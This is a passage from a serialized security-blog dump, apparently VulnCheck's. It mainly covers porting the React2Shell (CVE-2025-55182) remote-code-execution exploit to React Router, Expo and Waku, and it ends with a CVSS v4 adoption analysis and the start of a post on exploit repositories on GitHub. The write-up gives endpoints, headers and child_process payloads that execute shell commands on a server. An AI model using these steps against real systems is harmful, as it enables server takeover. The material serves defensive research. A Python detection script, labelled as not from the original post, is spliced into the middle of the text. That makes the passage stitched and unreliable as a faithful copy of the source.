Based on our testing and canary development, it appears that enabling RSC Framework Mode inherits the requirement that ",[886,21368,21272],{}," headers be set, but luckily (for attackers) it doesn’t seem like that value has to correlate with an actual set value to reach the vulnerable sink.",[18,21371,21372],{},"This means that a vulnerable React Router application will just need any action ID header value set and it will be exploitable by the same payload values as the React RSC and Next.js.",[993,21374,21376],{"id":21375},"expo","Expo",[18,21378,21379,21380,21385,21386,21389,21390,21393,21394,21397,21398,21401],{},"The Expo framework ",[47,21381,21384],{"href":21382,"rel":21383},"https:\u002F\u002Fdocs.expo.dev\u002Fguides\u002Fserver-components\u002F",[51],"also includes"," experimental support for RSC that requires explicitly enabling the RSC integration with a ",[886,21387,21388],{},"reactServerFunctions"," flag. Once that flag is enabled and RSC is built into a client endpoint, it appears at first that the Expo project generates its HTML document in a similar way to the core React RSC integration; but as it turns out, Expo bundles the RSC client-facing JavaScript functions into an ",[886,21391,21392],{},"entry.bundle"," file that is accessible from ",[886,21395,21396],{},"\u002Fnode_modules\u002Fexpo-router\u002Fentry.bundle?platform=web",". The platform variable does appear to be required, but ",[886,21399,21400],{},"web"," was consistent in our testing. That bundle resource contains all the RSC function calls.",[18,21403,21404,21405,21408,21409,21412],{},"The requests to the Expo RSC functionality quickly diverge from the vanilla RSC integration by requiring that each of the function calls goes to a specific path in place of the header value. 
For example, our test application would send RSC values to ",[886,21406,21407],{},"\u002F_flight\u002Fweb\u002FACTION_.\u002Ffunctions\u002Frender-home.tsx\u002FrenderHomeAsync.txt"," and would set the ",[886,21410,21411],{},"expo-platform"," header to match the platform sent in the retrieved bundle. The requests to those endpoints then allow for usage of the same payloads as with the previous frameworks.",[18,21414,21415,21416,21418],{},"Fully automated exploitation is possible on Expo by combining the consistent path for ",[886,21417,21392],{},", the extraction of functions to predictable path formats, and the known headers:",[68,21420],{"src":21421,"alt":21422,"className":21423},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F6-light.png","Image 6",[10876,21260],[68,21425],{"src":21426,"alt":21422,"className":21427},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F6.png",[21265,21266],[993,21429,21221],{"id":21430},"waku",[18,21432,21433,21437],{},[47,21434,21221],{"href":21435,"rel":21436},"https:\u002F\u002Fwaku.gg\u002F",[51]," markets itself as a “Minimal React framework”, since like these other targets Waku is of course, a React framework that supports RSC to facilitate server-side rendering. You don’t have to look far on their homepage to figure this out, either — one of the first things mentioned after “Getting started” is the rendering that Waku offers, via RSC.",[18,21439,21440,21441,21444],{},"Spinning up a test target for this one is simple; in their getting started guide, the project developers show a one-liner to quickly stand up a test project using ",[886,21442,21443],{},"npm create waku@latest",". Of course if you were to use this exact version today, you would get a project running a patched version of React on the back end. 
While it’s great that they’ve patched it all up, we obviously need an unpatched version.",[18,21446,21447,21448,21451,21452,59],{},"Running ",[886,21449,21450],{},"npm view create-waku versions"," should give you a list of viable candidates, and you can just pick an older one. We used ",[886,21453,21454],{},"npm create waku@0.12.4-0.26.0-alpha.2-0",[18,21456,21457,21458,21461,21462,21465],{},"When you run that command, it will prompt for a project name: just hit enter, then follow the instructions to ",[886,21459,21460],{},"cd"," into the directory and start it with ",[886,21463,21464],{},"npm run dev",", which serves the project at port 3000.",[18,21467,21468],{},"What you end up with is a simple page like this:",[18,21470,21471],{},[68,21472],{"alt":21473,"src":21474},"Waku landing page","\u002Fblog\u002Freact2shell-beyond-nextjs\u002Fwaku-landing.png",[18,21476,21477],{},"So now that it is up and running, we just need to see what is going on behind the scenes to get a starting point for trying to “port” the React2Shell exploit to this target.",[18,21479,21480],{},"We hook up the browser to BurpSuite and do a “Hard-Refresh” on the page, then click on the “About page” link since that is about the only thing you can do here.",[18,21482,21483],{},"Nothing interesting appears to happen, but looking at the BurpSuite log you can see a particularly interesting request that went across when we clicked on the “About page” link.",[1354,21485,21488],{"className":21486,"code":21487,"language":1359},[1357],"GET \u002FRSC\u002FR\u002Fabout.txt?query= HTTP\u002F1.1\nHost: localhost:3000\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko\u002F20100101 Firefox\u002F135.0\nAccept: *\u002F*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http:\u002F\u002Flocalhost:3000\u002F\nX-Waku-Router-Skip: [\"page:\u002F\",\"layout:\u002F\",\"root\",\"route:\u002F\"]\nDNT: 1\nSec-GPC: 1\nConnection: keep-alive\nCookie: 
sessionId=fdce4ef9-83f1-44c7-aa10-0d61849ce6ee\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\n",[886,21489,21487],{"__ignoreMap":219},[18,21491,21492,21493,21496,21497,21500],{},"It’s right there in the URL, ",[886,21494,21495],{},"\u002FRSC\u002F",", and that same ",[886,21498,21499],{},".txt"," file extension that was also present in the Expo framework.",[18,21502,21503],{},"So this feels like a solid starting point. Like the other payloads, we will change the GET to POST and then keep the URL and headers that are already present in the site-generated request; here, we also slap in a multipart Content-Type header and a version of the React2Shell payload. This new request ends up looking like this:",[68,21505],{"src":21506,"alt":21507,"className":21508},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F7-light.png","Image 7",[10876,21260],[68,21510],{"src":21511,"alt":21507,"className":21512},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F7.png",[21265,21266],[18,21514,21515,21516],{},"You can see the JavaScript “payload” in there: ",[886,21517,21518],{},"console.log(\\“hi there neighbor\\”);",[18,21520,21521],{},"Hitting send on this request causes it to hang, which if recent history is any indication, is exactly what we want.",[18,21523,21524,21525,21528],{},"The terminal running ",[886,21526,21527],{},"npm run dev"," confirms this:",[1354,21530,21533],{"className":21531,"code":21532,"language":1359},[1357],"(.ia) lobsterjerusalem \u002Ftmp\u002Fyy\u002Fwaku-project $ npm run dev\n\n> waku-project@0.0.0 dev\n> waku dev\n\nready: Listening on http:\u002F\u002Flocalhost:3000\u002F\n[vite] connected.\n[vite] connected.\nhi there neighbor\n",[886,21534,21532],{"__ignoreMap":219},[18,21536,21537,21538,21541],{},"At this point we thought we would just slap a ",[886,21539,21540],{},"child_process"," payload into this and call it done.",[18,21543,21544,21545,21548],{},"With a new payload of: 
",[886,21546,21547],{},"require(\\\"child_process\\\").exec(\\\"id>\u002Ftmp\u002Fpr00f\\\");"," ready to go, we hit send, expect a hang, and instead get a 500 error.",[18,21550,21551],{},"Looking at the terminal output again, we see a giant bummer:",[1354,21553,21556],{"className":21554,"code":21555,"language":1359},[1357],"ReferenceError: require is not defined\n at Object.eval [as then] (eval at parseModelString \n… snipped for brevity …\n",[886,21557,21555],{"__ignoreMap":219},[18,21559,21560,21561,21564],{},"There’s no ",[886,21562,21563],{},"require()"," call available where we landed.",[18,21566,21567,21568,21571,21572,21574,21575,21578,21579,21582,21583,21585],{},"Now in a previous payload variant that we worked on for Next.js, there was a ",[886,21569,21570],{},"process.mainModule"," which had a ",[886,21573,21563],{}," method. So we employ the same general idea here. You can enumerate the methods available using payloads like ",[886,21576,21577],{},"console.log(Object.getOwnPropertyNames(global\u002Fprocess\u002Fwhatever variable));"," and then check the output in the terminal that is serving Waku. While there may be other candidates, we eventually found ",[886,21580,21581],{},"process.getBuiltinModule()"," to be a viable ",[886,21584,21563],{}," equivalent.",[18,21587,21588,21589,21592,21593,21596],{},"As a result, we swap out the payload for ",[886,21590,21591],{},"console.log(process.getBuiltinModule(\\\"child_process\\\").execSync(\\\"echo A\\\"));"," which prompts our terminal to output ",[886,21594,21595],{},"\u003CBuffer 41 0a>"," a.k.a (“A\\x0a”) — meaning it worked!",[18,21598,21599,21600,21602,21603,21606],{},"There’s one last step, but it would serve readers well to remember we are running this using ",[886,21601,21464],{}," which is dandy for our purposes; others may run it in a production context. 
Usually with npm projects this ends up being ",[886,21604,21605],{},"npm run start"," but you can look at the “scripts” section of the package.json just to be sure.",[18,21608,21609,21610,21612,21613,21616,21617,21619],{},"Executing ",[886,21611,21605],{}," does result in an error, but one that is easily fixed by first running ",[886,21614,21615],{},"npm run build"," before attempting ",[886,21618,21605],{}," again.",[18,21621,21622],{},"The production version is now running on port 8080, so we just adjust the settings in Burp’s repeater to send it there instead (as well as the host header, for good measure).",[18,21624,21625],{},"We hit send and got a 200 status code in response…and the command failed to execute.",[18,21627,21628,21629,21634],{},"At this point we thought the problem might be related to the header, since that seemed to be a defining factor in the other React2Shell framework targets we tested. We began reading the code on ",[47,21630,21633],{"href":21631,"rel":21632},"https:\u002F\u002Fgithub.com\u002Fwakujs\u002Fwaku",[51],"Waku’s GitHub"," pertaining to header parsing.",[18,21636,21637,21638,21641],{},"Our problem turned out not to be related to the header.  In fact, unlike the other frameworks, Waku does not require its own ",[886,21639,21640],{},"X-Waku-Router-Skip"," header at all; we removed the header, but it had no bearing on the success of the exploit.",[18,21643,21644,21645,21647,21648,21650,21651,21654],{},"After a bit more trial and error, we decided to do a light bit of fuzzing on the URL. As it turns out, all that is required to execute the payload in Waku’s “production” context is to ensure that the endpoint does not exist, though it still needs to have the ",[886,21646,21499],{}," extension and be behind the ",[886,21649,21495],{}," path. 
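As an added example (not VulnCheck's code and not part of the original post), the Python below turns the request shapes described above for Waku, Expo, React RSC and React Router into a small classifier, and checks a page body for the client-side artefacts the post calls out (`self.__FLIGHT_DATA`, `$ACTION_ID` tokens, the Expo entry bundle path). The sample requests and the HTML fragment are constructed for illustration, and the exact `$ACTION_ID` token shape is an assumption the post does not specify.

```python
# Added example (not from the VulnCheck post): classify requests that match the
# server-function call shapes the post reports for the non-Next.js RSC
# integrations, and fingerprint a page for the client-side artefacts it describes.
# SAMPLE_REQUESTS and SAMPLE_HTML are constructed; the $ACTION_ID token shape in
# extract_action_ids is an assumption.
import re
from typing import Mapping, Optional

MULTIPART = 'multipart/form-data'


def classify_rsc_request(method: str, path: str, headers: Mapping[str, str]) -> Optional[str]:
    '''Label a request that looks like an RSC server-function call, or return
    None. Plain client navigation (the GET /RSC/R/about.txt the Waku client
    sends) is deliberately not flagged: every variant in the post delivers
    its payload as a multipart POST.'''
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get('content-type', '').lower()
    p = path.split('?', 1)[0]  # compare the path without its query string
    if method.upper() != 'POST' or MULTIPART not in ctype:
        return None
    # Waku: any non-existent /RSC/<name>.txt works in dev and production;
    # X-Waku-Router-Skip is not required, so it is not checked.
    if p.startswith('/RSC/') and p.endswith('.txt'):
        return 'waku'
    # Expo: per-function path under /_flight/<platform>/ ending in .txt,
    # with an expo-platform header matching the platform of the bundle.
    if p.startswith('/_flight/') and p.endswith('.txt') and 'expo-platform' in h:
        return 'expo'
    # React RSC bundler integrations and React Router RSC Framework Mode key
    # the call on rsc-action-id. Parcel needs a real function name, React
    # Router accepts any value, so the header's presence is the signal.
    if 'rsc-action-id' in h:
        return 'react-rsc-or-react-router'
    return None


def extract_action_ids(html: str) -> list:
    '''Pull $ACTION_ID tokens out of the JavaScript blobs and forms an RSC page
    serves. Assumed token shape: $ACTION_ID plus identifier characters and an
    optional #function suffix (the post shows a13z6#createTodo).'''
    return sorted(set(re.findall(r'[$]ACTION_ID[A-Za-z0-9_]*(?:#[A-Za-z0-9_]+)?', html)))


def fingerprint_rsc_page(html: str) -> dict:
    '''Client-side artefacts the post calls out on RSC-enabled pages.'''
    return {
        'flight_data': 'self.__FLIGHT_DATA' in html,
        'action_ids': extract_action_ids(html),
        'expo_entry_bundle': '/node_modules/expo-router/entry.bundle' in html,
    }


# Constructed samples: (method, path, headers)
SAMPLE_REQUESTS = [
    ('GET', '/RSC/R/about.txt?query=', {'X-Waku-Router-Skip': '[]'}),
    ('POST', '/RSC/R/about.txt?query=', {'Content-Type': MULTIPART + '; boundary=x'}),
    ('POST', '/_flight/web/ACTION_./functions/render-home.tsx/renderHomeAsync.txt',
     {'expo-platform': 'web', 'content-type': MULTIPART + '; boundary=x'}),
    ('POST', '/', {'rsc-action-id': 'a13z6#createTodo', 'Content-Type': MULTIPART + '; boundary=x'}),
    ('POST', '/login', {'Content-Type': MULTIPART + '; boundary=x'}),
]

# Constructed fragment resembling what an RSC-enabled Parcel page serves
SAMPLE_HTML = (
    '<script>self.__FLIGHT_DATA=self.__FLIGHT_DATA||[];</script>'
    '<form><input type=hidden name=$ACTION_ID_a13z6#createTodo></form>'
)


def scan_samples() -> list:
    '''Labels for SAMPLE_REQUESTS, in order; None means not flagged.'''
    return [classify_rsc_request(m, p, h) for m, p, h in SAMPLE_REQUESTS]


if __name__ == '__main__':
    for (m, p, _), label in zip(SAMPLE_REQUESTS, scan_samples()):
        print(m, p, '->', label)
    print(fingerprint_rsc_page(SAMPLE_HTML))
```

The classifier keys on the multipart POST plus the framework-specific path or header rather than on a payload string, so it still fires when the JavaScript in the body changes; pair it with the page fingerprint to decide which hosts in an inventory actually expose an RSC integration.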
So in short, ",[886,21652,21653],{},"\u002FRSC\u002F\u003Cany valid URL characters>.txt"," will do the trick as a viable URL for exploitation in both dev and production contexts.",[18,21656,21657],{},"Here is a final functioning payload to end this on:",[68,21659],{"src":21660,"alt":21661,"className":21662},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F8-light.png","Image 8",[10876,21260],[68,21664],{"src":21665,"alt":21661,"className":21666},"\u002Fblog\u002Freact2shell-beyond-nextjs\u002F8.png",[21265,21266],[18,21668,21669],{},"If it hangs, it has likely executed the provided payload and RCE has been achieved.",[18,21671,21672,21673,21680,10515,21682,1246,21688,1255,21695,59],{},"Additional insight into React2Shell exploitation, PoCs, and payloads can be found in the following blogs: ",[47,21674,21677],{"href":21675,"rel":21676},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fcve-2025-55182-react-nextjs",[51],[1131,21678,21679],{},"Critical Vulnerability in React and Next.js (CVE-2025-55182)",[1131,21681,5437],{},[47,21683,21685],{"href":20134,"rel":21684},[51],[1131,21686,21687],{},"Reacting to Shells: React2Shell Variants & the CVE-2025-55182 Exploit Ecosystem",[47,21689,21692],{"href":21690,"rel":21691},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Freact2shell-canaries",[51],[1131,21693,21694],{},"React2Shell and What Our Canaries See",[47,21696,21699],{"href":21697,"rel":21698},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Freact2shell-github",[51],[1131,21700,21701],{},"React2Shell Exploits on 
GitHub",[61,21703,202],{"id":201},[18,21705,20123,21706,1246,21711,1255,21716,59],{},[47,21707,21709],{"href":10789,"rel":21708},[51],[1131,21710,10793],{},[47,21712,21714],{"href":10796,"rel":21713},[51],[1131,21715,10801],{},[47,21717,21719],{"href":19435,"rel":21718},[51],[1131,21720,19437],{},[18,21722,1228,21723,1234,21726,1240,21729,1246,21732,1255,21735,1260],{},[47,21724,1233],{"href":10806,"rel":21725},[51],[47,21727,1239],{"href":1237,"rel":21728},[51],[47,21730,1245],{"href":1243,"rel":21731},[51],[47,21733,1251],{"href":1249,"rel":21734},[51],[47,21736,216],{"href":1258,"rel":21737},[51],{"title":219,"searchDepth":220,"depth":220,"links":21739},[21740,21741,21742,21743,21744,21745],{"id":21198,"depth":1266,"text":21199},{"id":21237,"depth":1266,"text":21238},{"id":21356,"depth":1266,"text":21357},{"id":21375,"depth":1266,"text":21376},{"id":21430,"depth":1266,"text":21221},{"id":201,"depth":220,"text":202},"2025-12-16","VulnCheck's Initial Access Intelligence team analyzes React2Shell CVE-2025-55182 exploitability in  frameworks that utilize the vulnerable components outside of Next.js alone, with emphasis on exploitation steps and potential fingerprinting paths.",{"slug":21749},"react2shell-beyond-nextjs","\u002Fblog\u002Freact2shell-beyond-nextjs",{"title":21167,"description":21747},"blog\u002Freact2shell-beyond-nextjs",[242,1280,1279],"2yDJJ4ZVCJj1IztGmgHWgciuINTTPEO5-MtEpewnv3k",{"id":21756,"title":21757,"articles":21758,"authors":21766,"body":21768,"date":22024,"description":21772,"extension":234,"image":7,"link":7,"meta":22025,"navigation":237,"path":22027,"seo":22028,"series":7,"stem":22029,"subtype":7,"tags":22030,"__hash__":22032},"blog\u002Fblog\u002Fcvss-severity.md","Critical CVEs, CVSS v4, and the Adoption Gap No One Talks About",[21759,21762],{"title":21760,"source":3495,"link":21761,"date":20182},"Risky Bulletin: Belarus deploys spyware on journalists' 
phones","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-belarus-deploys-spyware-on-journalists-phones\u002F",{"title":21763,"source":14382,"link":21764,"date":21765},"⚡ Weekly Recap: Firewall Exploits, AI Data Theft, Android Hacks, APT Attacks, Insider Leaks & More","https:\u002F\u002Fthehackernews.com\u002F2025\u002F12\u002Fweekly-recap-firewall-exploits-ai-data.html","2025-12-22",[21767],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":21769,"toc":22015},[21770,21773,21776,21780,21783,21789,21792,21796,21799,21805,21808,21812,21815,21821,21824,21827,21831,21834,21840,21844,21847,21852,21856,21859,21993,21998,22001,22004,22006,22008,22010],[18,21771,21772],{},"A common topic that’s been brought to my attention on several occasions is the perceived increase in vulnerabilities deemed “Critical” by their CVSS severity. According to FIRST, CVSS severity ratings are intended to help organizations assess and prioritize vulnerability management efforts. With this in mind, I set out to explore CVSS severity trends over time, which ultimately led me to examine the impact and adoption of CVSS v4.",[18,21774,21775],{},"For this research, I used public data aggregated by VulnCheck from sources including NIST NVD, CISA, CVE Numbering Authorities, and vendor security advisories. I selected a single CVSS score for each published CVE, choosing the score associated with the most recent CVSS version available at the time.",[61,21777,21779],{"id":21778},"has-the-volume-of-critical-severity-vulnerabilities-increased-over-time","Has the Volume of Critical Severity Vulnerabilities Increased Over Time?",[18,21781,21782],{},"First, I examined CVSS severity by year to better understand how vulnerability volume is distributed across severity levels, using the most recent CVSS version available for each CVE. 
It is also worth noting that, at the time of this research, 2025 still had approximately three weeks remaining for CVE issuance.",[18,21784,21785],{},[68,21786],{":width":10862,"alt":21787,"src":21788},"Critical Vulnerabilities","\u002Fblog\u002Fcvss-severity\u002Fcvss-severity-by-year.png",[18,21790,21791],{},"At a glance, the volume of CVEs classified as Critical has remained relatively consistent over the past four years, with a slight dip observed in 2024 and 2025. In contrast, the number of Medium and Low severity CVEs has increased substantially. While this trend could still change as more CVEs are published, the proportion of Critical CVEs relative to the total number of vulnerabilities has clearly declined. In other words, there are significantly more CVEs overall, but proportionally fewer Critical and High severity issues.",[61,21793,21795],{"id":21794},"could-cvss-v4-be-a-contributor-to-the-slight-dip-in-critical-cves","Could CVSS v4 be a Contributor to the Slight Dip in Critical CVEs?",[18,21797,21798],{},"With CVSS v4 having been publicly available for roughly two years, I wanted to explore whether it may be contributing to the slight decline in Critical CVEs.",[18,21800,21801],{},[68,21802],{":width":10862,"alt":21803,"src":21804},"Critical Versions","\u002Fblog\u002Fcvss-severity\u002Fcvss-severity-by-version.png",[18,21806,21807],{},"To do this, I mapped CVSS severity by scoring version to identify any meaningful differences in severity distribution. The data shows a notable reduction in the percentage of CVEs scored as Critical or High under CVSS v4 compared to earlier versions.",[61,21809,21811],{"id":21810},"could-there-be-a-cvss-v4-outlier","Could There be a CVSS v4 Outlier?",[18,21813,21814],{},"To better understand the cause of this apparent shift, I took a deeper look at the CVEs scored using CVSS v4. 
What quickly became apparent is that 49% of CVEs with a CVSS v4 score were published by VulDB, which disproportionately influences the overall CVSS v4 dataset.",[18,21816,21817],{},[68,21818],{":width":10862,"alt":21819,"src":21820},"Critical Outlier","\u002Fblog\u002Fcvss-severity\u002Fcvss-severity-outlier.png",[18,21822,21823],{},"When CVEs published by VulDB are excluded, the resulting severity distribution aligns much more closely with CVSS v3 and v3.1. This raised the question: what is unique about VulDB’s use of CVSS v4?",[18,21825,21826],{},"The primary difference appears to be the consistent use of Subsequent System Impact Metrics set to None (N). This choice, which may be deliberate (for example, limited visibility into subsequent-system impact, or limits on what can be scored automatically), results in lower overall CVSS v4 severity scores for nearly all affected CVEs.",[61,21828,21830],{"id":21829},"what-adoption-is-there-of-cvss-v4-across-cves-published-in-2025","What Adoption is there of CVSS v4 Across CVEs published in 2025?",[18,21832,21833],{},"More than two years after the publication of the CVSS v4 specification, only 25.9% of the 43,002 CVEs published in 2025 have been enriched with a CVSS v4 score.",[18,21835,21836],{},[68,21837],{":width":10862,"alt":21838,"src":21839},"CVSS Version","\u002Fblog\u002Fcvss-severity\u002Fcves-by-cvss-version.png",[61,21841,21843],{"id":21842},"who-is-enriching-cve-records-with-cvss-v4-scores","Who is enriching CVE records with CVSS v4 Scores?",[18,21845,21846],{},"Next, I examined who is contributing CVSS v4 scores. In total, 232 distinct sources have published or enriched CVEs with CVSS v4 data. 
While this represents a reasonable foundation after two years, a larger issue remains: historically dominant enrichment sources including NIST NVD and CISA ADP, are rarely publishing CVSS v4 scores.",[18,21848,21849],{},[68,21850],{":width":10862,"alt":21838,"src":21851},"\u002Fblog\u002Fcvss-severity\u002Fcvss-v4-source.png",[61,21853,21855],{"id":21854},"what-major-cvss-contributors-arent-enriching-cve-records-with-cvss-v4-scores-in-2025","What Major CVSS contributors aren’t enriching CVE records with CVSS v4 Scores in 2025?",[18,21857,21858],{},"This led me to examine which major CVSS contributors have not adopted CVSS v4 in 2025. I analyzed CVSS sources by volume to identify organizations that scored large numbers of CVEs without providing a CVSS v4 score. The table below highlights the top 15 such sources.",[307,21860,21861,21871],{},[310,21862,21863],{},[313,21864,21865,21868],{},[316,21866,21867],{},"CVSS Source",[316,21869,21870],{},"# of CVEs Scored w\u002Fo CVSS v4",[336,21872,21873,21881,21889,21897,21905,21913,21921,21929,21937,21945,21953,21961,21969,21977,21985],{},[313,21874,21875,21878],{},[341,21876,21877],{},"CISA-ADP",[341,21879,21880],{},"7269",[313,21882,21883,21886],{},[341,21884,21885],{},"NIST",[341,21887,21888],{},"7254",[313,21890,21891,21894],{},[341,21892,21893],{},"Patchstack",[341,21895,21896],{},"5309",[313,21898,21899,21902],{},[341,21900,21901],{},"Wordfence",[341,21903,21904],{},"2521",[313,21906,21907,21910],{},[341,21908,21909],{},"Redhat",[341,21911,21912],{},"1757",[313,21914,21915,21918],{},[341,21916,21917],{},"Microsoft Corporation",[341,21919,21920],{},"1071",[313,21922,21923,21926],{},[341,21924,21925],{},"GitHub, Inc.",[341,21927,21928],{},"933*",[313,21930,21931,21934],{},[341,21932,21933],{},"Adobe Systems 
Incorporated",[341,21935,21936],{},"637",[313,21938,21939,21942],{},[341,21940,21941],{},"MITRE",[341,21943,21944],{},"413",[313,21946,21947,21950],{},[341,21948,21949],{},"ZDI",[341,21951,21952],{},"316",[313,21954,21955,21958],{},[341,21956,21957],{},"IBM Corporation",[341,21959,21960],{},"313",[313,21962,21963,21966],{},[341,21964,21965],{},"Oracle",[341,21967,21968],{},"312",[313,21970,21971,21974],{},[341,21972,21973],{},"Qualcomm, Inc.",[341,21975,21976],{},"212",[313,21978,21979,21982],{},[341,21980,21981],{},"Cisco Systems, Inc.",[341,21983,21984],{},"189",[313,21986,21987,21990],{},[341,21988,21989],{},"SAP SE",[341,21991,21992],{},"185",[22,21994,21995],{},[25,21996,21997],{},"GitHub has started adopting CVSS v4 in 2025 w\u002F 1153 CVEs scored with CVSS v4",[18,21999,22000],{},"What this ultimately suggests is that CVSS v4 adoption is constrained not by lack of availability, but by limited participation from some of the largest and most influential CVE publishers and enrichers. Commonly cited reasons include resource constraints, required tooling changes, and a perception that CVSS v4 provides limited additional value while increasing scoring complexity and operational overhead.",[18,22002,22003],{},"As a result, perceived changes in severity trends, particularly around “Critical” CVEs, are more likely influenced by partial adoption and subjective scoring practices than by inherent changes introduced by the CVSS v4 specification itself. 
That said, the relatively limited volume of CVSS v4 scoring still makes it difficult to fully assess the true impact of CVSS v4 on severity distribution.",[61,22005,202],{"id":201},[18,22007,205],{},[18,22009,208],{},[18,22011,211,22012,217],{},[47,22013,216],{"href":214,"rel":22014},[51],{"title":219,"searchDepth":220,"depth":220,"links":22016},[22017,22018,22019,22020,22021,22022,22023],{"id":21778,"depth":220,"text":21779},{"id":21794,"depth":220,"text":21795},{"id":21810,"depth":220,"text":21811},{"id":21829,"depth":220,"text":21830},{"id":21842,"depth":220,"text":21843},{"id":21854,"depth":220,"text":21855},{"id":201,"depth":220,"text":202},"2025-12-15",{"slug":22026},"cvss-severity","\u002Fblog\u002Fcvss-severity",{"title":21757,"description":21772},"blog\u002Fcvss-severity",[1280,242,22031],"cvss","WJSmDGVSC7fsIF-sT_tl-KqpfJEDoqUhm_yQZv5qwz4",{"id":22034,"title":21701,"articles":22035,"authors":22044,"body":22046,"date":22039,"description":22703,"extension":234,"image":7,"link":7,"meta":22704,"navigation":237,"path":22706,"seo":22707,"series":7,"stem":22708,"subtype":7,"tags":22709,"__hash__":22711},"blog\u002Fblog\u002Freact2shell-github.md",[22036,22040],{"title":22037,"source":11218,"link":22038,"date":22039},"React2Shell Exploits Flood the Internet as Attacks Continue","https:\u002F\u002Fwww.darkreading.com\u002Fthreat-intelligence\u002Freact2shell-exploits-flood-internet-attacks-continue","2025-12-12",{"title":22041,"source":22042,"link":22043,"date":21746},"Nation-State and Cybercrime Exploits Tied to 
React2Shell","ISMG","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fnation-state-cybercrime-exploits-tied-to-react2shell-a-30285",[22045],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":22047,"toc":22695},[22048,22051,22055,22063,22070,22077,22092,22096,22100,22104,22107,22111,22115,22118,22141,22144,22148,22152,22155,22168,22177,22181,22202,22219,22234,22248,22251,22279,22283,22291,22298,22305,22631,22634,22638,22641,22644,22646,22672,22692],[263,22049],{":list":22050,"ico":266,"title":20},"[\"React2Shell triggered a surge of fake, broken, or misleading exploits on GitHub, and the platform’s decentralized model means almost none of that noise is moderated or cleaned up for the public good.\",\"Buried in that noise were genuinely interesting ideas, including in-memory webshells and creative payload variations, that deserve more attention from defenders than they received.\",\"VulnCheck reviews public exploit repositories, separates signal from noise, and publishes the curated React2Shell dataset for free for anyone who wants to explore it.\"]",[61,22052,22054],{"id":22053},"the-react2shell-exploit-surge","The React2Shell Exploit Surge",[18,22056,22057,22058,22062],{},"At VulnCheck, one of the more Sisyphean tasks our exploit dev team handles is reviewing the constant stream of “exploits” published to developer platforms like GitHub, GitLab, and Gitee. The volume of fake, broken, malicious, and (especially lately) AI-generated slop pretending to be real exploit code is staggering. But it’s also exactly why this work matters. If no one separates signal from noise, defenders and researchers are left with a polluted ecosystem. 
So for our customers and the broader community, we manually review every exploit before it’s folded into our product and the community-available ",[47,22059,22061],{"href":11516,"rel":22060},[51],"VulnCheck Exploit Database"," (XDB).",[18,22064,22065],{},[68,22066],{"alt":22067,"src":22068,"style":22069},"Live shot of the team maintaining the exploit moderation queue","\u002Fblog\u002Freact2shell-github\u002Fthe-queue.png","width: 40%; height: auto; margin-left: auto; margin-right: auto;",[18,22071,22072,22073,22076],{},"The volume of ",[47,22074,10533],{"href":10531,"rel":22075},[51]," (React2Shell) exploits has been staggering, easily outpacing anything we have had to review before. By noon on December 10, 2025, we had approved 128 GitHub exploits and blocked 127 more. A brutal ratio, but an honest reflection of what gets published during a high-profile CVE.",[18,22078,22079,22080,22085,22086,22091],{},"For those unfamiliar with the saga, the first wave of React2Shell activity was almost entirely useless AI-generated exploits published after the CVE dropped on December 3, 2025. Everything shifted on the afternoon of December 4, when ",[47,22081,22084],{"href":22082,"rel":22083},"https:\u002F\u002Fgist.github.com\u002Fmaple3142",[51],"maple3142"," published a working proof-of-concept ",[47,22087,22090],{"href":22088,"rel":22089},"https:\u002F\u002Fgist.github.com\u002Fmaple3142\u002F48bc9393f45e068cf8c90ab865c0f5f3",[51],"Gist",". That single PoC flipped the ecosystem from AI noise to genuine exploit development, and the pace immediately accelerated. 
We were approving new variants steadily, with developers continuing to publish refinements through the weekend of December 6 and 7.",[14603,22093,22095],{"id":22094},"approved-github-exploits-by-publication-date","Approved GitHub Exploits By Publication Date",[11128,22097],{":labels":22098,":values":22099},"[\"2025-12-04\",\"2025-12-05\",\"2025-12-06\",\"2025-12-07\",\"2025-12-08\",\"2025-12-09\",\"2025-12-10\"]","[3,19,26,23,27,19,11]",[61,22101,22103],{"id":22102},"what-vulncheck-saw-in-the-data","What VulnCheck Saw in the Data",[18,22105,22106],{},"Naturally, no one is going to review all 128 exploits. A small number get attention, and the rest disappear into the GitHub void. We track star counts to help customers surface the popular ones, and the numbers speak for themselves: 72 repositories have zero stars, and 21 have just one. In most high-profile CVEs, the meaningful work quickly separates itself from the long tail of clones and noise, and React2Shell followed that pattern exactly.",[14603,22108,22110],{"id":22109},"number-of-react2shell-repositories-by-star-count","Number of React2Shell Repositories By Star Count",[11128,22112],{":labels":22113,":values":22114},"[0,1,2,3,4,5,7,10,12,14,18,19,24,34,55,86,88,238,787,1120]","[73,21,9,4,1,2,3,2,1,2,1,1,1,1,1,1,1,1,1,1]",[18,22116,22117],{},"If you go by star count, only a handful of repositories stand out, and three sit clearly above the rest. These are the exploits that most people saw first and that shaped much of the subsequent development:",[1789,22119,22120,22127,22134],{},[25,22121,22122,22126],{},[47,22123,22124],{"href":22124,"rel":22125},"https:\u002F\u002Fgithub.com\u002Fmsanft\u002FCVE-2025-55182",[51],": One of the earliest public exploits. 
